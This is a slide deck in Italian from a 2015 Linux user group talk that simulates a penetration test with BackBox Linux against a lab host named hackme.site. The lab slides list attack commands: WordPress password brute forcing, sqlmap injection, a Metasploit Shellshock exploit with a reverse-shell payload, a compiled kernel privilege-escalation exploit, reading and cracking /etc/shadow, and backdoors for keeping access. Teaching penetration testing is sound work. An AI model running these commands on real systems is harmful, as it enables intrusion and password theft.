Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”
Edoardo Di Pietro – “Virtual Influencer vs Umano: Rubiamo il lavoro all’AI”
 
ScrapeGraphAI: a new way to scrape context with AI
ScrapeGraphAI: a new way to scrape context with AIScrapeGraphAI: a new way to scrape context with AI
ScrapeGraphAI: a new way to scrape context with AI
 

BackBox Linux: Simulazione di un Penetration Test

  • 1. BackBox Linux Penetration Test and Security Assessment Forlì Linux Users Group - 11 Dicembre 2015 Simulazione di un Penetration Test Andrea Draghetti
  • 2. About Me BackBox Team Member Over Security Founder Independent Security Researcher ….
  • 3. About BackBox BackBox è una distribuzione Free Open Source nata nel 2010 in Italia ed è concepita per gli appassionati di Sicurezza Informatica! Permette di effettuare Penetration Testing e Security Assessment. È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT Security, Mobile Analysis, ecc. 
 
 Ha un piano di rilascio previsto ogni 4 mesi e compatibile con ecosistemi a 32 o 64Bit.
  • 4. Look At The World НИН 28.11.2015 DistroWatch attesta a BackBox la seconda posizione della sua categoria. È la 56° distro Linux più scaricata al mondo. Il 37% dei Download proviene dal continente Asiatico, BackBox 4.4 ha ottenuto oltre 50mila download in 30 giorni!
  • 7. Simulazione di un Penetration Test I. Information Gathering; II. Vulnerability Assessment; III. Exploitation; IV. Privilege Escalation; V. Maintaining Access; VI. Reporting. Documento completo sulla simulazione di un Penetration Test http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf Standard, in fase di definizione, degli elementi fondamentali di un PenTest http://www.pentest-standard.org
  • 8. Information Gathering L’Information Gathering ha l’obbiettivo di raccogliere informazioni utili sul bersaglio come una lista di nomi di dominio, l’architettura della piattaforma, delimitazione di indirizzi IP, sistemi e porte attive, servizi offerti ed infine un elenco di nominativi ed eMail utili in caso di attacco Social Engineering. I dati raccolti in questa fase ci permetteranno di scegliere la linea di attacco da seguire nel passo successivo. Per questa fase sfrutteremo • nmap • dirs3arch
  • 9. Vulnerability Assessment L’attività di Vulnerability Assessment permette di identificare ogni vulnerabilità creando un quadro completo dello stato di esposizione della rete in analisi a tutte le vulnerabilità note, ma non è in grado di valutarne con precisione l’effettiva sfruttabilità. Per questa attività vengono abitualmente utilizzati tools automatici che grazie alla loro velocità di scansione permettono di analizzare in breve tempo un ampio numero di servizi. Per questa fase sfrutteremo • wpscan • sqlmap
  • 10. Exploitation La fase di Exploitation permette di ricercare all’interno di un software una vulnerabilità in grado di provocare un imprevisto nel sistema bersaglio del nostro attacco. Questa tecnica spesso permette di ottenere il controllo di un sistema informatico, l’acquisizione di privilegi oppure un Denial of Service. Ci sono diversi metodi di classificazione degli exploit, più in generale avremo un exploit remoto se compiuto attraverso la rete o un exploit locale se si opera direttamente sul sistema. Per questa fase sfrutteremo • Metasploit e CVE-2014-6271
  • 11. Privilege Escalation In questa Privilege Escalation sfrutteremo l’accesso ricavato precedentemente attraverso ShellShock per innalzare i nostri privilegi; questo avviene sfruttando una ulteriore vulnerabilità del sistema. Successivamente tramite un tool di password cracking (john the ripper) e/o brute force, cercheremo di ottenere le password di utenti con privilegi elevati (come root). Per questa fase sfrutteremo • GCC e CVE-2012-0056 • John the Ripper
  • 12. Maintaining Access Violato il sistema è indubbiamente preferibile crearsi un accesso comodo e duraturo in grado di poter operare in un secondo momento anche da remoto senza ripetere l’intera procedura di hack. Nella fase di Maintaining Access si installano abitualmente Backdoor o WebShell che ci permettono di avere il controllo immediato del sistema. Per questa fase sfrutteremo • weevely
  • 14. Lab BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site
  • 15. Lab BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Wordpress • XSS Vulnerability • No Brute force protection • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site
  • 16. Lab BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Wordpress • XSS Vulnerability • No Brute force protection • Panel • SQL Injection • sqlmap -u http://hackme.site/panel --form • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site
  • 17. Lab BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Wordpress • XSS Vulnerability • No Brute force protection • Panel • SQL Injection • CGI • Shellshock Vulnerability • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • sqlmap -u http://hackme.site/panel --form • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site
  • 18. Lab BackBox Linux Target: hackme.site • Porte • 22 SSH • 80 Apache • Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin • Wordpress • XSS Vulnerability • No Brute force protection • Panel • SQL Injection • CGI • Shellshock Vulnerability • Shell • Kernel Privilege Escalation • john password --show • unshadow passwd shadow > passwod • cat etc/shadow && cat etc/passwd • ./exploit • gcc 18411.c -o exploit • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/ reverse_tcp • use exploit/multi/http/ apache_mod_cgi_bash_env_exec • msfconsole • sqlmap -u http://hackme.site/panel --form • wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site